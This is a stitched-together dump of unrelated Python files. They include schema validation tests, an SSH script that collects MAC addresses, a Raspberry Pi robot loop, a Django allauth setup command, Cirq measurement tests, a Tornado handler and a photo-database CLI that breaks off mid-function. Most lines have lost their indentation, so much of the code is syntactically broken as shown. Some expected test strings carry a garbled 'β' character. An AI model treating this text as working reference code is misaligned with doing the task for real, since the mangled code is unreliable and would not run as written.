assert valid_full == AccessSchema().load(valid_full)
@pytest.mark.parametrize("invalid_access,invalid_attr", [
({"files": "restricted",
"embargo": {"active": True, "until": "2131-01-01", "reason": "secret!"}},
"record"),
({"record": "public",
"embargo": {"active": True, "until": "2131-01-01", "reason": "secret!"}},
"files"),
({"record": "public", "files": "restricted",
"embargo": {"active": False, "until": "2131-01-01", "reason": "secret!"}},
"embargo"),
({"record": "public", "files": "restricted",
"embargo": {"active": True, "until": "1999-01-01", "reason": "secret!"}},
"embargo"),
({"record": "invalid", "files": "restricted",
"embargo": {"active": False, "until": "1999-01-01", "reason": "secret!"}},
"record"),
({"record": "public", "files": "invalid",
"embargo": {"active": False, "until": "1999-01-01", "reason": "secret!"}},
"files"),
])
def test_invalid(invalid_access, invalid_attr):
with pytest.raises(ValidationError) as e:
AccessSchema().load(invalid_access)
error_fields = e.value.messages.keys()
assert len(error_fields) == 1
assert invalid_attr in error_fields
|
#coding: utf-8
import subprocess, string, ast
def get(host):
file = open("%s.txt"%host, "r+")
macs = file.read()
macs = ast.literal_eval(macs)
return macs
def set(host):
macs = []
command1 = "ssh user@%s 'ls /sys/class/net'" %host
try:
        list_interfaces = subprocess.check_output(command1, shell=True)
        list_interfaces = string.split(list_interfaces)
        for interface in list_interfaces:
command = "ssh user@%s 'cat /sys/class/net/%s/address'" %(host, interface) # command to return mac address
mac = subprocess.check_output(command, shell=True) # Receives the output of the above command
macs.append(mac.rstrip())
except subprocess.CalledProcessError:
        print 'Could not get the MAC address of %s' % host
file = open("%s.txt"%host, "w+")
file.write(str(macs))
file.close()
print '%s %s'%(host, macs)
|
from expression import *
# programming the GPIO by BCM pin numbers
#TRIG = servo['Sensor']['ultrasonic']['trigger']
#ECHO = servo['Sensor']['ultrasonic']['echo']
TRIG = 24
ECHO = 23
GPIO.setup(TRIG,GPIO.OUT) # initialize GPIO Pin as outputs
GPIO.setup(ECHO,GPIO.IN) # initialize GPIO Pin as input
def forward():
Run(1,0,1,0,80)
def back():
Run(0,1,0,1,80)
def left():
Run(0,1,1,0,80)
def right():
Run(1,0,0,1,80)
Stop()
count=0
def Distance():
avgDistance=0
    for i in range(5): # take 5 samples; callers divide the returned sum by 5
GPIO.output(TRIG, False) #Set TRIG as LOW
time.sleep(0.1) #Delay
GPIO.output(TRIG, True) #Set TRIG as HIGH
time.sleep(0.00001) #Delay of 0.00001 seconds
GPIO.output(TRIG, False) #Set TRIG as LOW
off=1
while GPIO.input(ECHO)==0: #Check whether the ECHO is LOW
pass
pulse_start = time.time()
off=0
while GPIO.input(ECHO)==1: #Check whether the ECHO is HIGH
pass
pulse_end = time.time()
pulse_duration = pulse_end - pulse_start #time to get back the pulse to sensor
distance = pulse_duration * 17150 #Multiply pulse duration by 17150 (34300/2) to get distance
distance = round(distance,2) #Round to two decimal points
avgDistance=avgDistance+distance
return avgDistance
while True:
i=0
avgDistance=Distance()/5
time.sleep(1)
flag=0
if avgDistance < 100:
        count += 1 #The obstacle is within the 100 cm range
Stop()
time.sleep(2)
changeDegreeGpio([0],[0],5,0.05)
dist = Distance()/5
print("right dist ",dist)
time.sleep(8)
if dist>=5:
right()
continue
changeDegreeGpio([0],[180],5,0.05)
dist = Distance()/5
print("left dist ",dist)
time.sleep(8)
if dist>=5:
left()
continue
changeDegreeGpio([0],[90],5,0.05)
time.sleep(1)
back()
time.sleep(1.5)
if (count%3 ==1) & (flag==0):
right()
flag=1
else:
left()
flag=0
time.sleep(1.5)
        Stop()
time.sleep(1)
else:
print("go forward")
flag=0
|
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.management.base import BaseCommand
from django.contrib.sites.models import Site
from allauth.socialaccount.models import SocialApp
from tamusers.providers.tampere.provider import TampereProvider
class Command(BaseCommand):
help = 'Create or update tamusers allauth SocialApp'
def handle(self, *args, **options):
changed = False
try:
app = SocialApp.objects.get(provider=TampereProvider.id)
except SocialApp.DoesNotExist:
app = SocialApp(provider=TampereProvider.id)
self.stdout.write(self.style.SUCCESS('Creating new SocialApp'))
if not app.name:
            app.name = 'Tampereen kaupungin työntekijät'
changed = True
client_id = secret_key = None
        jwt_settings = getattr(settings, 'JWT_AUTH', None)
if jwt_settings:
client_id = jwt_settings.get('JWT_AUDIENCE')
secret_key = jwt_settings.get('JWT_SECRET_KEY')
if not client_id:
raise ImproperlyConfigured("You must set JWT_AUTH['JWT_AUDIENCE'] to correspond to your client ID")
if not secret_key:
raise ImproperlyConfigured("You must set JWT_AUTH['JWT_SECRET_KEY'] to correspond to your secret key")
if app.client_id != client_id:
changed = True
app.client_id = client_id
if app.secret != secret_key:
changed = True
app.secret = secret_key
if changed:
app.save()
if not app.sites.exists():
app.sites.add(Site.objects.get(id=settings.SITE_ID))
changed = True
if changed:
self.stdout.write(self.style.SUCCESS('SocialApp successfully updated'))
else:
self.stdout.write(self.style.NOTICE('Already synced -- no changes needed'))
|
# Copyright 2020 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import dataclasses
import datetime
import time
import numpy as np
import pytest
import cirq
import cirq.work as cw
from cirq.work.observable_measurement_data import (
_check_and_get_real_coef,
_obs_vals_from_measurements,
_stats_from_measurements,
)
from cirq.work.observable_settings import _MeasurementSpec
def test_get_real_coef():
q0 = cirq.LineQubit(0)
assert _check_and_get_real_coef(cirq.Z(q0) * 2, atol=1e-8) == 2
assert _check_and_get_real_coef(cirq.Z(q0) * complex(2.0), atol=1e-8) == 2
with pytest.raises(ValueError):
_check_and_get_real_coef(cirq.Z(q0) * 2.0j, atol=1e-8)
def test_obs_vals_from_measurements():
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
obs = cirq.Z(a) * cirq.Z(b) * 10
vals = _obs_vals_from_measurements(bitstrings, qubit_to_index, obs, atol=1e-8)
should_be = [10, -10, -10, 10]
np.testing.assert_equal(vals, should_be)
def test_stats_from_measurements():
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
obs = cirq.Z(a) * cirq.Z(b) * 10
mean, err = _stats_from_measurements(bitstrings, qubit_to_index, obs, atol=1e-8)
# The mean is zero since our bitstrings have balanced even- and odd-
# parity cases.
assert mean == 0
# Since we multiplied our observable by 10, the standard deviation is
# 10 [each obs val deviates by 10]. The variance is 10**2 and the
# squared-standard-error-of-the-mean can be found by dividing by the
# number of samples minus 1.
assert err == 10**2 / (4 - 1)
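# (Concretely: the sample variance with ddof=1 is 4 * 10**2 / (4 - 1), and
# dividing by the 4 repetitions gives 10**2 / (4 - 1), which is consistent
# with the assertion above.)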
def test_observable_measured_result():
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
omr = cw.ObservableMeasuredResult(
setting=cw.InitObsSetting(
init_state=cirq.Z(a) * cirq.Z(b), observable=cirq.Y(a) * cirq.Y(b)
),
mean=0,
variance=5**2,
repetitions=4,
circuit_params={'phi': 52},
)
assert omr.stddev == 5
assert omr.observable == cirq.Y(a) * cirq.Y(b)
assert omr.init_state == cirq.Z(a) * cirq.Z(b)
cirq.testing.assert_equivalent_repr(omr)
assert omr.as_dict() == {
'init_state': cirq.Z(a) * cirq.Z(b),
'observable': cirq.Y(a) * cirq.Y(b),
'mean': 0,
'variance': 25,
'repetitions': 4,
'param.phi': 52,
}
omr2 = dataclasses.replace(
omr,
circuit_params={
'phi': 52,
'observable': 3.14, # this would be a bad but legal parameter name
'param.phi': -1,
},
)
assert omr2.as_dict() == {
'init_state': cirq.Z(a) * cirq.Z(b),
'observable': cirq.Y(a) * cirq.Y(b),
'mean': 0,
'variance': 25,
'repetitions': 4,
'param.phi': 52,
'param.observable': 3.14,
'param.param.phi': -1,
}
@pytest.fixture()
def example_bsa() -> 'cw.BitstringAccumulator':
"""Test fixture to create an (empty) example BitstringAccumulator"""
q0, q1 = cirq.LineQubit.range(2)
setting = cw.InitObsSetting(
init_state=cirq.KET_ZERO(q0) * cirq.KET_ZERO(q1), observable=cirq.X(q0) * cirq.Y(q1)
)
meas_spec = _MeasurementSpec(
max_setting=setting, circuit_params={'beta': 0.123, 'gamma': 0.456}
)
bsa = cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[
setting,
cw.InitObsSetting(init_state=setting.init_state, observable=cirq.X(q0)),
cw.InitObsSetting(init_state=setting.init_state, observable=cirq.Y(q1)),
],
qubit_to_index={q0: 0, q1: 1},
)
return bsa
def test_bitstring_accumulator(example_bsa):
# test initialization
assert example_bsa.bitstrings.shape == (0, 2)
assert example_bsa.chunksizes.shape == (0,)
assert example_bsa.timestamps.shape == (0,)
# test consume_results
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.uint8)
example_bsa.consume_results(bitstrings)
assert example_bsa.bitstrings.shape == (4, 2)
assert example_bsa.chunksizes.shape == (1,)
assert example_bsa.timestamps.shape == (1,)
assert example_bsa.n_repetitions == 4
with pytest.raises(ValueError):
example_bsa.consume_results(bitstrings.astype(int))
# test results
results = list(example_bsa.results)
assert len(results) == 3
for r in results:
assert r.repetitions == 4
# test records
for r in example_bsa.records:
assert isinstance(r, dict)
assert 'repetitions' in r
assert r['repetitions'] == 4
def test_bitstring_accumulator_strings(example_bsa):
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.uint8)
example_bsa.consume_results(bitstrings)
q0, q1 = cirq.LineQubit.range(2)
settings = cw.observables_to_settings(
[cirq.X(q0), cirq.Y(q1), cirq.X(q0) * cirq.Y(q1)], qubits=[q0, q1]
)
strings_should_be = [
'+Z(q(0)) * +Z(q(1)) β X(q(0)): 0.000 +- 0.577',
'+Z(q(0)) * +Z(q(1)) β Y(q(1)): 0.000 +- 0.577',
'+Z(q(0)) * +Z(q(1)) β X(q(0))*Y(q(1)): 0.000 +- 0.577',
]
for setting, ssb in zip(settings, strings_should_be):
assert example_bsa.summary_string(setting) == ssb, ssb
assert (
str(example_bsa)
== """Accumulator +Z(q(0)) * +Z(q(1)) β X(q(0))*Y(q(1)); 4 repetitions
+Z(q(0)) * +Z(q(1)) β X(q(0))*Y(q(1)): 0.000 +- 0.577
+Z(q(0)) * +Z(q(1)) β X(q(0)): 0.000 +- 0.577
+Z(q(0)) * +Z(q(1)) β Y(q(1)): 0.000 +- 0.577"""
)
def test_bitstring_accumulator_equality():
et = cirq.testing.EqualsTester()
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.uint8)
chunksizes = np.asarray([4])
timestamps = np.asarray([datetime.datetime.now()])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
obs = cirq.Z(a) * cirq.Z(b) * 10
setting = cw.InitObsSetting(init_state=cirq.Z(a) * cirq.Z(b), observable=obs)
meas_spec = _MeasurementSpec(setting, {})
cirq.testing.assert_equivalent_repr(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings.copy(),
chunksizes=chunksizes.copy(),
timestamps=timestamps.copy(),
)
)
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings.copy(),
chunksizes=chunksizes.copy(),
timestamps=timestamps.copy(),
),
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings.copy(),
chunksizes=chunksizes.copy(),
timestamps=timestamps.copy(),
),
)
time.sleep(1)
timestamps = np.asarray([datetime.datetime.now()])
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
)
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=_MeasurementSpec(setting, {'a': 2}),
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
)
bitstrings = bitstrings.copy()
bitstrings[0] = [1, 1]
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
)
chunksizes = np.asarray([2, 2])
timestamps = np.asarray(list(timestamps) * 2)
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
)
def _get_ZZ_Z_Z_bsa_constructor_args():
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.uint8)
chunksizes = np.asarray([4])
timestamps = np.asarray([datetime.datetime.now()])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
settings = list(
cw.observables_to_settings(
[cirq.Z(a) * cirq.Z(b) * 7, cirq.Z(a) * 5, cirq.Z(b) * 3], qubits=[a, b]
)
)
meas_spec = _MeasurementSpec(settings[0], {})
return {
'meas_spec': meas_spec,
'simul_settings': settings,
'qubit_to_index': qubit_to_index,
'bitstrings': bitstrings,
'chunksizes': chunksizes,
'timestamps': timestamps,
}
def test_bitstring_accumulator_stats():
kwargs = _get_ZZ_Z_Z_bsa_constructor_args()
settings = kwargs['simul_settings']
a, b = kwargs['qubit_to_index']
bsa = cw.BitstringAccumulator(**kwargs)
# There are three observables, each with mean 0 because
# the four 2-bit strings have even numbers of a) ones in the
# first position b) ones in the second position c) even parity
# pairs.
np.testing.assert_allclose([0, 0, 0], bsa.means())
# Covariance: Sum[(x - xbar)(y - ybar)] / (N-1)
# where xbar and ybar are 0, per above. Each individual observed
# value is +-1, so (x - xbar)(y - ybar) is +-1 (neglecting observable coefficients)
# For off-diagonal elements, there are two +1 and two -1 terms for each entry
# so the total contribution is zero, and the matrix is diagonal
should_be = np.array([[4 * 7**2, 0, 0], [0, 4 * 5**2, 0], [0, 0, 4 * 3**2]])
should_be = should_be / (4 - 1) # covariance formula
should_be = should_be / 4 # cov of the distribution of sample mean
np.testing.assert_allclose(should_be, bsa.covariance())
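# (For example, the ZZ diagonal entry: each of the 4 observations contributes
# (+-7)**2 = 49, so the entry is 4 * 49 / (4 - 1) / 4 = 49 / 3.)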
for setting, var in zip(settings, [4 * 7**2, 4 * 5**2, 4 * 3**2]):
np.testing.assert_allclose(0, bsa.mean(setting))
np.testing.assert_allclose(var / 4 / (4 - 1), bsa.variance(setting))
np.testing.assert_allclose(np.sqrt(var / 4 / (4 - 1)), bsa.stderr(setting))
bad_obs = [cirq.X(a) * cirq.X(b)]
bad_setting = list(cw.observables_to_settings(bad_obs, qubits=[a, b]))[0]
with pytest.raises(ValueError):
bsa.mean(bad_setting)
def test_bitstring_accumulator_stats_2():
bitstrings = np.array([[0, 0], [0, 0], [1, 1], [1, 1]], np.uint8)
chunksizes = np.asarray([4])
timestamps = np.asarray([datetime.datetime.now()])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
settings = list(cw.observables_to_settings([cirq.Z(a) * 5, cirq.Z(b) * 3], qubits=[a, b]))
meas_spec = _MeasurementSpec(settings[0], {})
bsa = cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=settings,
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
# There are two observables, each with mean 0 because
# the four 2-bit strings have equal numbers of zeros and ones in a) the
# first position and b) the second position.
np.testing.assert_allclose([0, 0], bsa.means())
# Covariance: Sum[(x - xbar)(y - ybar)] / (N-1)
# where xbar and ybar are 0, per above. Each individual observed
# value is +-1, so (x - xbar)(y - ybar) is +-1 (neglecting observable coefficients)
# In this case, the measurements are perfectly correlated.
should_be = 4 * np.array([[5 * 5, 5 * 3], [3 * 5, 3 * 3]])
should_be = should_be / (4 - 1) # covariance formula
should_be = should_be / 4 # cov of the distribution of sample mean
np.testing.assert_allclose(should_be, bsa.covariance())
for setting, var in zip(settings, [4 * 5**2, 4 * 3**2]):
np.testing.assert_allclose(0, bsa.mean(setting))
np.testing.assert_allclose(var / 4 / (4 - 1), bsa.variance(setting))
np.testing.assert_allclose(np.sqrt(var / 4 / (4 - 1)), bsa.stderr(setting))
def test_bitstring_accumulator_errors():
q0, q1 = cirq.LineQubit.range(2)
settings = cw.observables_to_settings(
[cirq.X(q0), cirq.Y(q0), cirq.Z(q0), cirq.Z(q0) * cirq.Z(q1)], qubits=[q0, q1]
)
grouped_settings = cw.group_settings_greedy(settings)
max_setting = list(grouped_settings.keys())[0]
simul_settings = grouped_settings[max_setting]
with pytest.raises(ValueError):
bsa = cw.BitstringAccumulator(
meas_spec=_MeasurementSpec(max_setting, {}),
simul_settings=simul_settings,
qubit_to_index={q0: 0, q1: 1},
bitstrings=np.array([[0, 1], [0, 1]]),
chunksizes=np.array([2]),
)
with pytest.raises(ValueError):
bsa = cw.BitstringAccumulator(
meas_spec=_MeasurementSpec(max_setting, {}),
simul_settings=simul_settings,
qubit_to_index={q0: 0, q1: 1},
bitstrings=np.array([[0, 1], [0, 1]]),
chunksizes=np.array([3]),
timestamps=[datetime.datetime.now()],
)
bsa = cw.BitstringAccumulator(
meas_spec=_MeasurementSpec(max_setting, {}),
simul_settings=simul_settings[:1],
qubit_to_index={q0: 0, q1: 1},
)
with pytest.raises(ValueError):
bsa.covariance()
with pytest.raises(ValueError):
bsa.variance(simul_settings[0])
with pytest.raises(ValueError):
bsa.mean(simul_settings[0])
bsa.consume_results(np.array([[0, 0]], dtype=np.uint8))
assert bsa.covariance().shape == (1, 1)
def test_flatten_grouped_results():
q0, q1 = cirq.LineQubit.range(2)
settings = cw.observables_to_settings(
[cirq.X(q0), cirq.Y(q0), cirq.Z(q0), cirq.Z(q0) * cirq.Z(q1)], qubits=[q0, q1]
)
grouped_settings = cw.group_settings_greedy(settings)
bsas = []
for max_setting, simul_settings in grouped_settings.items():
bsa = cw.BitstringAccumulator(
meas_spec=_MeasurementSpec(max_setting, {}),
simul_settings=simul_settings,
qubit_to_index={q0: 0, q1: 1},
)
bsa.consume_results(np.array([[0, 0], [0, 0], [0, 0]], dtype=np.uint8))
bsas.append(bsa)
results = cw.flatten_grouped_results(bsas)
assert len(results) == 4
for res in results:
# We pass all 0's to each consume_results, so everything is 1 +- 0
assert res.mean == 1
assert res.variance == 0
assert res.repetitions == 3
def _get_mock_readout_calibration(qa_0=90, qa_1=10, qb_0=91, qb_1=9):
# Mock readout correction results by constructing a BitstringAccumulator
# with two <Z> measurements
q1_ro = np.array([0] * qa_0 + [1] * qa_1)
q2_ro = np.array([0] * qb_0 + [1] * qb_1)
rs = np.random.RandomState(52)
rs.shuffle(q1_ro)
rs.shuffle(q2_ro)
ro_bitstrings = np.vstack((q1_ro, q2_ro)).T
assert ro_bitstrings.shape == (100, 2)
chunksizes = np.asarray([100])
timestamps = np.asarray([datetime.datetime.now()])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
ro_settings = list(cw.observables_to_settings([cirq.Z(a), cirq.Z(b)], qubits=[a, b]))
(ro_meas_spec_setting,) = list(
cw.observables_to_settings([cirq.Z(a) * cirq.Z(b)], qubits=[a, b])
)
ro_meas_spec = _MeasurementSpec(ro_meas_spec_setting, {})
ro_bsa = cw.BitstringAccumulator(
meas_spec=ro_meas_spec,
simul_settings=ro_settings,
qubit_to_index=qubit_to_index,
bitstrings=ro_bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
return ro_bsa, ro_settings, ro_meas_spec_setting
def test_readout_correction():
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
ro_bsa, ro_settings, ro_meas_spec_setting = _get_mock_readout_calibration()
# observables range from 1 to -1 while bitstrings range from 0 to 1
assert ro_bsa.mean(ro_settings[0]) == 0.8
assert ro_bsa.mean(ro_settings[1]) == 0.82
assert np.isclose(ro_bsa.mean(ro_meas_spec_setting), 0.8 * 0.82, atol=0.05)
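# (With 90 zeros and 10 ones on the first qubit, <Z> = (90 - 10) / 100 = 0.8;
# the second qubit's 91/9 split likewise gives 0.82.)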
bitstrings = np.array(
[[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 1], [1, 1]], dtype=np.uint8
)
chunksizes = np.asarray([len(bitstrings)])
timestamps = np.asarray([datetime.datetime.now()])
qubit_to_index = {a: 0, b: 1}
settings = list(
cw.observables_to_settings([cirq.X(a) * cirq.Y(b), cirq.X(a), cirq.Y(b)], qubits=[a, b])
)
meas_spec = _MeasurementSpec(settings[0], {})
# First, make one with no readout correction
bsa1 = cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=settings,
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
# [XY: one excitation, X: one excitation, Y: two excitations]
np.testing.assert_allclose([1 - 1 / 4, 1 - 1 / 4, 1 - 2 / 4], bsa1.means())
np.testing.assert_allclose([0.75, 0.75, 0.5], bsa1.means())
# Turn on readout correction
bsa2 = cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=settings,
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
readout_calibration=ro_bsa,
)
# Readout correction increases variance
for setting in settings:
assert bsa2.variance(setting) > bsa1.variance(setting)
np.testing.assert_allclose(
[0.75 / (0.8 * 0.82), 0.75 / 0.8, 0.5 / 0.82], bsa2.means(), atol=0.01
)
# Variance becomes singular when readout error is 50/50
ro_bsa_50_50, _, _ = _get_mock_readout_calibration(qa_0=50, qa_1=50)
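# (A 50/50 split gives a calibration <Z> of (50 - 50) / 100 = 0, so computing
# the corrected means below divides by zero.)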
bsa3 = cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=settings,
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
readout_calibration=ro_bsa_50_50,
)
with pytest.raises(ZeroDivisionError):
bsa3.means()
assert bsa3.variance(settings[1]) == np.inf
def test_readout_correction_errors():
kwargs = _get_ZZ_Z_Z_bsa_constructor_args()
settings = kwargs['simul_settings']
ro_bsa, _, _ = _get_mock_readout_calibration()
kwargs['readout_calibration'] = ro_bsa
bsa = cw.BitstringAccumulator(**kwargs)
# Variance becomes singular as the estimated value approaches zero
np.testing.assert_allclose(bsa.means(), [0, 0, 0])
assert bsa.variance(settings[0]) == np.inf
|
# The MIT License (MIT)
#
# Copyright (c) 2015-present, Xiaoyou Chen
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import importlib_metadata
from .huobi_spot_gateway import HuobiSpotGateway
from .huobi_futures_gateway import HuobiFuturesGateway
from .huobi_usdt_gateway import HuobiUsdtGateway
from .huobi_inverse_gateway import HuobiInverseGateway
try:
__version__ = importlib_metadata.version("vnpy_huobi")
except importlib_metadata.PackageNotFoundError:
__version__ = "dev"
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Ivar Vargas Belizario
# Copyright (c) 2020
# E-mail: ivar@usp.br
import tornado.ioloop
import tornado.web
import tornado.httpserver
import uuid
from vx.pgff.Settings import *
class BaseHandler(tornado.web.RequestHandler):
def set_default_headers(self):
self.set_header("Access-Control-Allow-Origin", "*")
self.set_header("Access-Control-Allow-Headers", "x-requested-with")
self.set_header('Access-Control-Allow-Methods', 'POST, GET, OPTIONS')
def get_current_user(self):
if Settings.MULIUSER == 0:
return "localuser"
elif Settings.MULIUSER == 1:
return self.get_secure_cookie("user")
def get_current_email(self):
if Settings.MULIUSER == 0:
return "localuser"
elif Settings.MULIUSER == 1:
return self.get_secure_cookie("email")
def get_current_adminid(self):
if Settings.MULIUSER == 0:
return "localuser"
elif Settings.MULIUSER == 1:
return self.get_secure_cookie("adminid")
|
import argparse
import os
import re
import sys
from voussoirkit import betterhelp
from voussoirkit import interactive
from voussoirkit import pathclass
from voussoirkit import pipeable
from voussoirkit import spinal
from voussoirkit import stringtools
from voussoirkit import vlogging
import etiquette
# HELPERS ##########################################################################################
def export_symlinks_albums(albums, destination, dry_run):
album_directory_names = etiquette.helpers.decollide_names(albums, lambda a: a.display_name)
for (album, directory_name) in album_directory_names.items():
associated_directories = album.get_associated_directories()
if len(associated_directories) == 1:
album_dir = associated_directories.pop()
directory_name = etiquette.helpers.remove_path_badchars(directory_name)
symlink_dir = destination.with_child(directory_name)
if dry_run:
yield symlink_dir
continue
if not album_dir.exists:
continue
if symlink_dir.exists:
yield symlink_dir
continue
print(album, symlink_dir)
os.symlink(src=album_dir, dst=symlink_dir)
yield symlink_dir
def export_symlinks_photos(photos, destination, dry_run):
photo_filenames = etiquette.helpers.decollide_names(photos, lambda p: p.basename)
for (photo, filename) in photo_filenames.items():
symlink_path = destination.with_child(filename)
if dry_run:
yield symlink_path
continue
if not photo.real_path.exists:
continue
if symlink_path.exists:
yield symlink_path
continue
print(symlink_path.absolute_path)
os.symlink(src=photo.real_path, dst=symlink_path)
yield symlink_path
def get_photos_by_glob(pattern):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
pattern = pathclass.normalize_sep(pattern)
if pattern == '**':
return search_in_cwd(yield_photos=True, yield_albums=False)
cwd = pathclass.cwd()
(folder, pattern) = os.path.split(pattern)
if folder:
folder = cwd.join(folder)
else:
folder = cwd
files = [f for f in folder.glob(pattern) if f.is_file]
for file in files:
try:
photo = photodb.get_photo_by_path(file)
yield photo
except etiquette.exceptions.NoSuchPhoto:
pass
def get_photos_by_globs(patterns):
for pattern in patterns:
yield from get_photos_by_glob(pattern)
def get_photos_from_args(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
photos = []
if args.photo_id_args:
photos.extend(photodb.get_photos_by_id(args.photo_id_args))
if args.photo_search_args:
photos.extend(search_by_argparse(args.photo_search_args, yield_photos=True))
return photos
def get_albums_from_args(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
albums = []
if args.album_id_args:
albums.extend(photodb.get_albums_by_id(args.album_id_args))
if args.album_search_args:
albums.extend(search_by_argparse(args.album_search_args, yield_albums=True))
return albums
def search_in_cwd(**kwargs):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
cwd = pathclass.cwd()
return photodb.search(
within_directory=cwd,
**kwargs,
)
def search_by_argparse(args, yield_albums=False, yield_photos=False):
return search_in_cwd(
area=args.area,
width=args.width,
height=args.height,
ratio=args.ratio,
bytes=args.bytes,
duration=args.duration,
author=args.author,
created=args.created,
extension=args.extension,
extension_not=args.extension_not,
filename=args.filename,
has_tags=args.has_tags,
has_thumbnail=args.has_thumbnail,
is_searchhidden=args.is_searchhidden,
sha256=args.sha256,
mimetype=args.mimetype,
tag_musts=args.tag_musts,
tag_mays=args.tag_mays,
tag_forbids=args.tag_forbids,
tag_expression=args.tag_expression,
limit=args.limit,
offset=args.offset,
orderby=args.orderby,
yield_albums=yield_albums,
yield_photos=yield_photos,
)
# ARGPARSE #########################################################################################
def add_remove_tag_argparse(args, action):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
tag = photodb.get_tag(name=args.tag_name)
if args.any_id_args:
photos = get_photos_from_args(args)
elif args.globs:
photos = get_photos_by_globs(args.globs)
else:
photos = search_in_cwd(yield_photos=True, yield_albums=False)
for photo in photos:
if action == 'add':
photo.add_tag(tag)
elif action == 'remove':
photo.remove_tag(tag)
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def delete_argparse(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
need_commit = False
if args.photo_id_args or args.photo_search_args:
photos = get_photos_from_args(args)
for photo in photos:
photo.delete(delete_file=args.delete_file)
need_commit = True
if args.album_id_args or args.album_search_args:
albums = get_albums_from_args(args)
for album in albums:
album.delete()
need_commit = True
if not need_commit:
return 0
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def digest_directory_argparse(args):
directories = pipeable.input(args.directory, strip=True, skip_blank=True)
directories = [pathclass.Path(d) for d in directories]
for directory in directories:
directory.assert_is_directory()
photodb = etiquette.photodb.PhotoDB.closest_photodb()
need_commit = False
for directory in directories:
digest = photodb.digest_directory(
directory,
exclude_directories=args.exclude_directories,
